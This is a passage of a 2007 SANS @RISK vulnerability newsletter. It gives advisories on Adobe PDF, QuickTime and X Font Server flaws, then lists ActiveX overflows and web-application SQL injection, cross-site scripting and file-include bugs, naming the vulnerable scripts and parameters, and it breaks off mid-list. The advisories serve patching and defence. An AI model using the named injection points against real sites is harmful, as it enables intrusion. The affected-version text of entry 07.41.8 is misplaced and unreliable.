Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: VI, Issue: 41
October 8, 2007

SANS Newsletters Home

This week's top vulnerability is from Adobe and affects Windows XP and IE 7 users. See number 1 below. Apple QuickTime for Windows also need sto be patched.

There is finally some good news on the quest to reduce the number of security flaws in software. If we are ever going to turn the tide against the attackers, we have to find a way to deploy more secure code. Only programmers who know how to write secure code can make that happen. The good news is that 23 programmers, (out of 42 pioneers who took the first exam) passed the GSSP exams in Secure Coding in Java and Secure Coding in C. Cisco is in the lead among software and hardware companies with three people passing the first exams. Other companies with new GSSP certified programmers include Kaiser Permanente, Siemens, Telus and more. The names and organizations of people who passed are listed in the last story of this issue.

Momentum on the GSSP has begun. One large US company has told all its 6,500 programmers and outsourced coders that they have until next summer to pass the secure coding exam or they will not be allowed to touch the code. And one of the three largest software companies in the world just sent letters to the ten colleges that supply the most programmers telling them that job candidates should consider demonstrating secure coding skills through the GSSP.

Alan

P.S. For a schedule of times and places where programmers can take the exam: http://www.sans.org/gssp/

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Other Microsoft Products
    • 1
    • Third Party Windows Apps
    • 7 (#1, #3, #6)
    • Linux
    • 2
    • Solaris
    • 1 (#4)
    • Unix
    • 1
    • Cross Platform
    • 16 (#2, #5)
    • Web Application - Cross Site Scripting
    • 11
    • Web Application - SQL Injection
    • 9
    • Web Application
    • 22
    • Network Device
    • 11

************************* Sponsored By Sunbelt Software ********************

Is Your Network Protected Against Blended Malware Threats?

CounterSpy Enterprise gives you protection against malware using a new hybrid technology that merges the 'system cleaning' properties of traditional antispyware products with the efficiency of powerful antivirus-based technology.

Find out how many machines on your network are infected! Download the free trial now!

http://www.sans.org/info/17426

****************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Other Microsoft Products
Third Party Windows Apps
Linux
Solaris
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

******************************Sponsored Link: ******************************

1) Learn to select and implement the right tools at the Data Leakage and Insider Threat Summit December 3-4. http://www.sans.org/info/17431

2) Where can you find Hacker Exploits, Security Essentials, Forensics, Wireless, Auditing, CISSP, and SANS' other top-rated courses?

- - Washington DC (12/13-12/18): http://www.sans.org/cdi07 - - New Orleans (1/12-1/17): http://www.sans.org/security08/event.php - - London (11/26 - 12/1): http://www.sans.org/london07/ - - Chicago (11/2-11/7): http://www.sans.org/chicago07/event.php - - Tokyo (11/5-11/10): http://www.sans.org/sanstokyo2007_autumn/event.php

****************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) CRITICAL: Adobe PDF Viewer Remote Code Execution
  • Affected:
    • Adobe Reader versions 8.1 and prior
    • Adobe Acrobat versions 8.1 and prior
    • Adobe Acrobat Elements versions 8.1 and prior
    • Adobe Acrobat 3D

  • Description: Adobe has disclosed information related to a remote code execution vulnerability in its Portable Document Format (PDF) viewing applications that was discussed in an earlier edition of @RISK. A specially crafted PDF file could trigger this vulnerability to execute arbitrary code when the file is viewed. Only systems running Microsoft Windows XP and Microsoft Internet Explorer 7 are vulnerable. Microsoft Windows Vista is not affected. The flaw relates to a failure to properly handle URLs included in PDF files. Some technical details for this vulnerability are publicly available, and a proof-of-concept is believed to be available in the wild.

  • Status: Adobe confirmed, no updates available. A workaround is available in Adobe's advisory.

  • References:
  • (3) HIGH: Apple QuickTime Arbitrary Script Injection Vulnerability
  • Affected:
    • Apple QuickTime for Windows versions 7.2 and prior

  • Description: QuickTime is Apple's streaming media framework, and is available for Apple Mac OS X and Microsoft Windows. The Microsoft Windows version contains a flaw in its handling of URLs. A specially crafted QuickTime Link (QTL) file containing a URL could trigger this vulnerability and allow an attacker to execute arbitrary script code with the privileges of the current user. This issue may be related to an issue discussed in a previous @RISK. Note that this issue only affects QuickTime when installed on Microsoft Windows; QuickTime on Apple Mac OS X is not affected.

  • Status: Apple confirmed, updates available.

  • References:
  • (4) MODERATE: X.org/Sun X Font Server Multiple Vulnerabilities
  • Affected:
    • X.org X Font Server versions 1.0.4 and prior

  • Description: The X Font Server is used by the X Window System to serve fonts to remote clients for display. The X.org reference implementation of this software is considered to be the standard implementation and is the most widely deployed version. It is installed by default on numerous Unix, Unix-like, and Linux operating systems. It contains multiple memory corruption vulnerabilities. A specially crafted request to the server could exploit one of these vulnerabilities an allow an attacker to execute arbitrary code with the privileges of the vulnerable process. While the vulnerable software is installed on a wide selection of operating systems, Sun's Solaris is the only major operating system known to expose the vulnerable software remotely. Technical details for this vulnerability are available via source code analysis. Other X implementations, such as XFree86 may also be vulnerable, but currently only the X.org implementation included with Sun Solaris is known to be remotely vulnerable.

  • Status: X.org confirmed, updates available. Users can mitigate the impact of this vulnerability by blocking access to TCP port 7100 at the network perimeter, if possible.

  • References:
Other Software
  • (6) HIGH: Altnet Download Manager ActiveX Control Buffer Overflow
  • Affected:
    • Altnet Download Manager versions 4.x
    • Kazaa versions 3.x and prior
    • Grokster

  • Description: The Altnet Download Manager is a popular download management application. Its functionality is exposed via an ActiveX control and this control contains a buffer overflow in its "Install" method. A specially crafted web page that instantiated this control could exploit this buffer overflow to execute arbitrary code with the privileges of the current user. Some technical details for this vulnerability are publicly available. Note that this ActiveX control is included in the Kazaa and Grokster applications.

  • Status: Vendor has not confirmed, no updates available. Users can mitigate the impact of this vulnerability by disabling the control via Microsoft's "kill bit" mechanism.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 41, 2007

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5549 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 07.41.1 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft October 2007 Advance Notification Multiple Vulnerabilities
  • Description: Microsoft has provided advance notification of seven security bulletins to be released on October 9, 2007. The highest severity rating for these issues is "Critical". Please refer to the link below for further details.
  • Ref: http://www.microsoft.com/technet/security/bulletin/rating.mspx
  • 07.41.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: CyberLink PowerDVD CLAVSetting.DLL Arbitrary File Overwrite
  • Description: CyberLink PowerDVD is a DVD playback application. The ActiveX control is exposed to an arbitrary file overwrite issue because it fails to properly sanitize user-supplied input.
  • Ref: http://support.microsoft.com/kb/240797
  • 07.41.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EDraw Office Viewer Component FtpDownloadFile ActiveX Buffer Overflow
  • Description: The EDraw Office Viewer Component is an ActiveX control to display and interact with Microsoft Office files such as Word, Excel, PowerPoint, Project and Visio. The application is exposed to buffer overflow issues because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. EDraw Office Viewer Component version 5.3 is affected.
  • Ref: http://support.microsoft.com/kb/240797
  • 07.41.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: CenterTools DriveLock Remote Buffer Overflow
  • Description: DriveLock is an application that facilitates device control and data security for mobile and portable devices that may be introduced into a network. It is available for Windows operating systems. The application is exposed to a buffer overflow issue because it fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. DriveLock and DriveLock Security Reporting Center versions 5.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/25902
  • 07.41.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Altnet Download Manager ADM4 ActiveX Buffer Overflow
  • Description: Altnet is a peer-to-peer distributor of licensed digital entertainment and file sharing applications. Altnet customers can use file sharing utilities such as KaZaA and Grokster to download media files. The application is exposed to a buffer overflow issue because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Altnet Download Manager version 4.0 is affected.
  • Ref: http://support.microsoft.com/kb/240797
  • 07.41.6 - CVE: CVE-2007-4673
  • Platform: Third Party Windows Apps
  • Title: Apple Quicktime for Windows Remote Code Execution
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote code execution issue due to a failure of the application to securely handle URIs. QuickTime version 7.2 running on the Microsoft Windows Vista or XP SP2 platforms is affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306560
  • 07.41.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Vba32 Personal Antivirus Insecure File Permissions Local Privilege Escalation
  • Description: VirusBlokAda Vba32 Personal is an antivirus application for the Microsoft Windows operating system. The application is exposed to a local privilege escalation issue that stems from a design error. Vba32 Personal version 3.12.2 is affected. Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066313.html
  • 07.41.8 - CVE: Not Available10.20.21 are affected.
  • Platform: Third Party Windows Apps
  • Title: ConeXware PowerArchiver BlackHole Archive Handling Buffer Overflow
  • Description: PowerArchiver is a file compression/decompression tool for the Microsoft Windows operating system. The application is exposed to a buffer overflow issue when handling specially-crafted BlackHole archives. This issue arises because PowerArchiver fails to perform boundary checks on user-supplied data. PowerArchiver versions prior to
  • Ref: http://www.securityfocus.com/bid/25938
  • 07.41.9 - CVE: Not Available
  • Platform: Linux
  • Title: rPath rMake Local Privilege Escalation
  • Description: rPath Linux is a specialized GNU/Linux distribution for the enterprise. The application is exposed to a local privilege escalation issue that stems from a design error. rMake version 1.0.11 is affected.
  • Ref: https://issues.rpath.com/browse/RMK-634
  • 07.41.10 - CVE: CVE-2007-4133
  • Platform: Linux
  • Title: Linux Kernel HugeLBT Local Denial of Service
  • Description: The Linux Kernel is exposed to a local denial of service issue due to a design error in the "hugebltfs" handling procedures. Linux kernel 2.6.x versions prior to 2.6.18 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.18
  • 07.41.11 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris I_PEEK IOCTL Handler Local Information Disclosure
  • Description: Sun Solaris is an enterprise-level UNIX distribution. The application is exposed to a local information disclosure issue because it fails to adequately sanitize user-supplied input. Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=603
  • 07.41.12 - CVE: Not Available
  • Platform: Unix
  • Title: SmbFTPD SMBDirList Format String
  • Description: SmbFTPD is an FTP server for BSD and UNIX platforms. The application is exposed to a format string issue that presents itself because the application fails to properly sanitize filenames that contain format specifiers. SmbFTPD versions prior to 0.97 are affected.
  • Ref: http://www.securityfocus.com/archive/1/481220
  • 07.41.13 - CVE: CVE-2007-5162
  • Platform: Cross Platform
  • Title: Ruby Net::HTTP SSL Insecure Certificate Validation Weakness
  • Description: Ruby's Net::HTTP is a library that implements functionality to perform HTTP and HTTPS network requests. It is included with the core Ruby package. The application is exposed to an insecure-certificate-validation weakness because the library fails to properly perform validity checks on X.509 certificates.
  • Ref: http://www.securityfocus.com/archive/1/480987
  • 07.41.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Fire X2100 M2 And X2200 M2 ELOM Unauthorized Access
  • Description: Sun Fire X2100 M2 and X2200 M2 are enterprise level servers. They use the Embedded Lights Out Manager (ELOM) for remote management purposes. The servers are exposed to an issue affecting the ELOM. This issue allows unprivileged users to initiate unauthorized network traffic from the server process.
  • Ref: http://sunsolve.sun.com/show.do?target=tous
  • 07.41.15 - CVE: CVE-2007-4996
  • Platform: Cross Platform
  • Title: Pidgin MSN Nudge Messages Remote Denial of Service
  • Description: Pidgin is a chat client available for multiple operating systems. It is formerly known as Gaim. The application is exposed to a remote denial of service issue. This issue occurs when handling MSN "Nudge" messages sent by users who are not on the recipient's buddy list. Pdgin versions prior to 2.2.1 are affected.
  • Ref: http://www.pidgin.im/news/security/?id=23
  • 07.41.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: FSD Exechelp And Execmulticast Multiple Remote Buffer Overflow Vulnerabilities
  • Description: FSD is a flight simulator server available for Microsoft Windows, Unix and other Unix-like operating systems. The application is exposed to multiple remote buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. FSD versions 2.052 d9 and 3.0000 d9 are affected.
  • Ref: http://www.securityfocus.com/archive/1/481221
  • 07.41.17 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Check Point SecurePlatform Multiple Buffer Overflow Vulnerabilities
  • Description: Check Point SecurePlatform is a server operating system with built-in security. Applications that use the Check Point SecurePlatform are exposed to multiple buffer overflow issues because the platform fails to perform adequate boundary checks on user-supplied data. SecurePlatform R60 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481219
  • 07.41.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: id Software Doom 3 Engine Console String Visualization Format String Vulnerability
  • Description: The Doom 3 engine is the underlying engine used for several video games developed by id Software. PunkBuster is an anti-cheating program commonly used on public game servers. The application is exposed to a format string issue that affects a "printf()"-type function that is used during the visualization of strings in the engine's command console.
  • Ref: http://www.securityfocus.com/archive/1/481229
  • 07.41.19 - CVE: CVE-2007-4568
  • Platform: Cross Platform
  • Title: X.Org X Font Server Multiple Memory Corruption Vulnerabilities
  • Description: X.Org X Font Server (XFS) is used to render fonts for the X servers. The application is exposed to multiple memory corruption issues. X Font Server version 1.0.4 is affected. Ref: http://lists.freedesktop.org/archives/xorg-announce/2007-October/000416.html
  • 07.41.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Borland InterBase Multiple Remote Buffer Overflow Vulnerabilities
  • Description: Borland InterBase is a scalable database application available for multiple operating platforms including Windows, Linux, and Solaris. The application is exposed to multiple remote buffer overflow issues because it fails to bounds check user-supplied input before copying it into an insufficiently sized memory buffer. Firebird versions 1.5.3, 1.5.4, 2.0.0, and 2.0.1 for Linux and Windows are affected.
  • Ref: http://risesecurity.org/advisory/RISE-2007002/
  • 07.41.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Weaknesses
  • Description: The Java Runtime Environment is an application that allows users to run Java applications. The application is exposed to multiple weaknesses. These issues affect the following packages for Windows, Solaris and Linux: - - JDK and JRE 6 Update 2 and earlier - - JDK and JRE 5.0 Update 12 and earlier - - SDK and JRE 1.4.2_15 and earlier - - SDK and JRE 1.3.1_20 and earlier Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103071-1&searchclause=
  • 07.41.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java WebStart Multiple File Access And Information Disclosure Vulnerabilities
  • Description: Sun Java Web Start is a utility included in the Java Runtime Environment. It enables Java applications to launch from a desktop or from a web page. The application is exposed to multiple remote issues. These issues affect the following packages: - - JDK and JRE 6 Update 2 and earlier - - JDK and JRE 5.0 update 12 and earlier - - SDK and JRE 1.4.2_15 and earlier Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103073-1&searchclause=
  • 07.41.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Firebird Relational Database Multiple Remote Stack Buffer Overflow Vulnerabilities
  • Description: Firebird is a Relational Database Management System (RDBMS) available for multiple operating systems. The application is exposed to multiple remote stack-based buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data.
  • Ref: http://www.risesecurity.org/advisory/RISE-2007003/
  • 07.41.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NetSupport Manager Initial Client Connection Buffer Overflow
  • Description: NetSupport Manager is a commercially available remote control and management application available for multiple platforms. The application is exposed to a buffer overflow issue because the client listening on TCP port 5405 does not adequately bounds check user-supplied input during the initial hand-shake process.
  • Ref: http://www.securityfocus.com/archive/1/481537
  • 07.41.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Cosminexus JSSE SSL/TLS Handshake Request Handling Denial of Service
  • Description: Hitachi Cosminexus is an application server available for multiple operating platforms. The application is exposed to a remote denial of service issue because the application fails to handle invalid SSL/TLS handshake requests. JSSE is an extended component of Cosminexus Developer's Kit for Java(TM). Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-031_e/index-e.html
  • 07.41.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi TPBroker Object Transaction Monitor Remote Denial of Service
  • Description: Hitachi TPBroker is a compliant-transaction manager based on CORBA and the Object Transaction Service (OTS). The application is exposed to a remote denial of service issue because it fails to handle invalid messages. Refer to the link below for further information. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-032_e/index-e.html
  • 07.41.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Cosminexus Agent Remote Denial of Service
  • Description: Hitachi Cosminexus is an application server available for multiple operating platforms. The application is exposed to a remote denial of service issue because it fails to handle invalid data sent by a process other than Cosminexus Manager. Hitachi Cosminexus versions 03-00 to 03-05 on Windows, HP-UX and Solaris are affected. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-033_e/index-e.html
  • 07.41.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: OpenVMS Multiple Denial of Service Vulnerabilities
  • Description: OpenVMS is a mainframe-like operating system originally developed by Digital. It is maintained and distributed by HP. The application is exposed to multiple local denial of service issues. OpenVMS ALPHA version 8.3 and OpenVMS for Integrity Servers version 8.3 are affected.
  • Ref: http://www.securityfocus.com/bid/25939
  • 07.41.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GroupLink eHelpDesk Multiple Cross-Site Scripting Vulnerabilities
  • Description: GroupLink's eHelpDesk (everything HelpDesk) is a web-based application implemented in JSP. The application is exposed to multiple cross-site scripting issues because it fails to sanitize the "username" and "LDAPError" input parameters in the "index2.jsp" script, and the "NA_DISPLAYNAME" input parameter in the "helpdesk/user/rf_create.jsp" script. eHelpDesk version 6.2.2 is affected.
  • Ref: http://www.securityfocus.com/bid/25870
  • 07.41.30 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: eGov Manager Multiple Cross-Site Scripting Vulnerabilities
  • Description: eGov Manager is a content manager designed for government sites. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input to the "center.exe" and "Index.exe" executables.
  • Ref: http://www.securityfocus.com/archive/1/481210
  • 07.41.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: OdysseySuite Mailbox.MWS Cross-Site Scripting
  • Description: OdysseySuite is a web-based banking application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "idkey" parameter of the "Mailbox.mws" script. OdysseySuite version 4.0.729 is affected. Ref: http://pridels-team.blogspot.com/2007/10/odysseysuite-internet-banking-vuln.html
  • 07.41.32 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Google Mini Search Appliance IE Parameter Cross-Site Scripting
  • Description: Google Mini Search Appliance is an integrated hardware and software enterprise search solution. The application is exposed to a cross-site scripting issue because it fails to sanitize the "ie" input parameter in the "search" script. Google Mini Search Appliance version 3.4.14 is affected.
  • Ref: http://www.securityfocus.com/bid/25894
  • 07.41.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Arbor Networks Peakflow SP Unspecified Multiple Cross-Site Scripting Vulnerabilities
  • Description: Peakflow SP is a network management appliance targeted to network service providers. The application is exposed to multiple cross-site scripting issues because it fails to properly sanitize user-supplied input. These issues affect multiple unspecified parameters used in HTTP "GET" and "POST" requests. Peakflow SP versions 3.5.1 and 3.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25907
  • 07.41.34 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: UebiMiau Index.PHP Cross-Site Scripting
  • Description: UebiMiau is a web-based email client. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input to the "f_email" parameter of the "index.php" script.
  • Ref: http://www.securityfocus.com/bid/25912
  • 07.41.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DRBGuestbook Index.PHP Cross-Site Scripting
  • Description: DRBGuestbook is a web-based guestbook application. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. Specifically, this issue affects the "action" parameter of the "index.php" script. DRBGuestbook version 1.1.13 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481417
  • 07.41.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Google FeedBurner FeedSmith Cross-Site Request Forgery
  • Description: FeedBurner FeedSmith is a plugin tool for web content publishers to manage RSS and other feeds. The application is exposed to a cross-site request-forgery issue. FeedBurner FeedSmith version 2.2 is affected. Ref: http://blogs.feedburner.com/feedburner/archives/2007/10/the_feedsmith_plugin_newly_for.php
  • 07.41.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GForge Verify.PHP Cross-Site Scripting
  • Description: GForge is an application for managing source code. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input to the "confirm_hash" parameter of the "account/verify.php" script. GForge version 4.6 is affected.
  • Ref: http://gforge.org/tracker/?func=detail&atid=105&aid=3094&group_id=1
  • 07.41.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: AppFuse Messages.JSP Cross-Site Scripting
  • Description: AppFuse is a Java-based tool for creating applications. AppFuse is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. Specifically, this issue affects the "out_value" parameter of the "addError()" function used in the "messages.jsp" script, which will accept a user-supplied script as an input parameter. AppFuse version 2.0-RC1 is affected.
  • Ref: http://issues.appfuse.org/browse/APF-880
  • 07.41.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities
  • Description: Stuffed Tracker is an application that allows users to monitor and analyze web traffic. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. Specifically, these issues affect the following scripts and parameters: campaign_link.html: GLink and actions.html: EditId.
  • Ref: http://www.securityfocus.com/archive/1/481530
  • 07.41.40 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: MD-Pro Index.PHP Firefox ID SQL Injection
  • Description: MD-Pro is a content management system (CMS). MD-Pro is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "Firefox ID" parameter of the "index.php" script before using it in an SQL query. MD-Pro version 1.0.76 is affected.
  • Ref: http://www.securityfocus.com/bid/25864
  • 07.41.41 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: MambAds Mambo Component CAID Parameter SQL Injection
  • Description: MambAds is a component for the Mambo content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "caid" parameter before using it in an SQL query. MambAds version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/25865
  • 07.41.42 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Expanded Calendar PHP-Fusion Module Show_Single.PHP SQL Injection
  • Description: PHP-Fusion is a content management system (CMS). The Expanded Calendar module for PHP-Fusion is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "sel" parameter of the "infusions/calendar_events_panel/show_single.php" script before using it in an SQL query. Expanded Calendar version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/25876
  • 07.41.43 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ASP Product Catalog Default.ASP SQL Injection
  • Description: ASP Product Catalog is a web-based database driven product catalog. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cid" parameter of the "default.php" script before using it in an SQL query. ASP Product Catalog version 1.0 Beta 1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481211
  • 07.41.44 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: X-script Guestbook mes_add.php Multiple SQL Injection Vulnerabilities
  • Description: X-script Guestbook is a web-based guestbook application. The application is exposed to multiple SQL injection issues because it fails to properly sanitize user-supplied input to the following parameters of "med_add.php" before using it in SQL queries: name, email, icq, website. X-script Guestbook version 1.3a is affected.
  • Ref: http://www.securityfocus.com/archive/1/481209
  • 07.41.45 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Ohesa Emlak Portal Multiple SQL Injection Vulnerabilities
  • Description: Ohesa Emlak Portal is a real estate portal. The Portal is exposed to multiple SQL injection issues because it fails to adequately sanitize user-supplied inputs before using them in an SQL query. Ohesa Emlak Portal version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25880
  • 07.41.46 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: iScripts MultiCart Multiple SQL Injection Vulnerabilities
  • Description: iScripts MultiCart is a web-based ecommerce application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "categorydetail.php"; catid and "search.php"; ddlcategory. iScripts MultiCart version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25895
  • 07.41.47 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Deonix Web Templates Management Index.PHP SQL Injection
  • Description: Web Templates Management is a web-based content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script before using it in an SQL query. Web Templates Management version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25926
  • 07.41.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Furkan Tastan Blog KATEGORI.ASP SQL Injection
  • Description: Furkan Tastan Blog is a blog application implemented in ASP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "kategori.asp" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25934
  • 07.41.49 - CVE: Not Available
  • Platform: Web Application
  • Title: i-Systems Inc. Feedreader3 RSS Feed HTML Injection
  • Description: Feedreader3 is an RSS feed aggregator. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Feedreader3 version 3.10 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481208
  • 07.41.50 - CVE: Not Available
  • Platform: Web Application
  • Title: Public Media Manager newstopic_inc.php Remote File Include
  • Description: Public Media Manager is a web-based content management system. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Public Media Manager version 1.3 is affected.
  • Ref: http://pmm-cms.sourceforge.net/
  • 07.41.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Zomplog admin/upload_files.php Unauthorized Access
  • Description: Zomplog is a web-based blogging application. The application is exposed to an unauthorized access issue because it fails to adequately limit access to administrative scripts. Zomplog version 3.8.1 is affected.
  • Ref: http://www.securityfocus.com/bid/25861
  • 07.41.52 - CVE: Not Available
  • Platform: Web Application
  • Title: MXBB MX Glance Module PHPBB_Root_Path Remote File Include
  • Description: MX Glance is a module for the mxBB bulletin board. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "contrib/mx_glance_sdesc.php" script. MX Glance version 2.3.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25866
  • 07.41.53 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBB openID OPENID_ROOT_PATH Parameter Remote File Include
  • Description: phpBB is an open-source forum application implemented in PHP. phpBB-openID is a module that allows forum users to login with their openID credentials. openID is a decentralized single sign-on system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "OPENID_ROOT_PATH" parameter of the "/includes/openid/Auth/OpenID/BBStore.php" script. phpBB openID version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25867
  • 07.41.54 - CVE: Not Available
  • Platform: Web Application
  • Title: actSite BASE.PHP BASECFG[BASEDIR] Parameter Remote File Include
  • Description: actSite is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "BaseCfg[BaseDir]" parameter of the "lib/base.php" script. actSite version 1.99.1 Beta is affected.
  • Ref: http://www.securityfocus.com/bid/25868
  • 07.41.55 - CVE: Not Available
  • Platform: Web Application
  • Title: actSite NEWS.PHP Local File Include
  • Description: actSite is a content management system. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "do" parameter of the "/phpinc/news.php" script. actSite version 1.56 is affected.
  • Ref: http://www.securityfocus.com/bid/25869
  • 07.41.56 - CVE: Not Available
  • Platform: Web Application
  • Title: phpFreeLog log.php Local File Include
  • Description: phpFreeLog is a PHP-based server logging tool. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "var" parameter of the "log.php" script. phpFreeLog alpha version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25873
  • 07.41.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Netkamp Emlak Scripti Multiple Input Validation Vulnerabilities
  • Description: Netkamp Emlak Scripti is a web-based application implemented in ASP. The application is exposed to multiple input validation issues because it fails to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/25875
  • 07.41.58 - CVE: Not Available
  • Platform: Web Application
  • Title: phpwcms-xt HTML_MENU_DirPath Multiple Remote File Include Vulnerabilities
  • Description: phpwcms-xt is a web-based content management system based on phpwcms. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input before using it in a PHP "require_once()" function call. phpwcms-xt version 0.0.7-beta is affected.
  • Ref: http://www.securityfocus.com/bid/25879
  • 07.41.59 - CVE: Not Available
  • Platform: Web Application
  • Title: Y&K Iletisim Formu Multiple HTML Injection Vulnerabilities
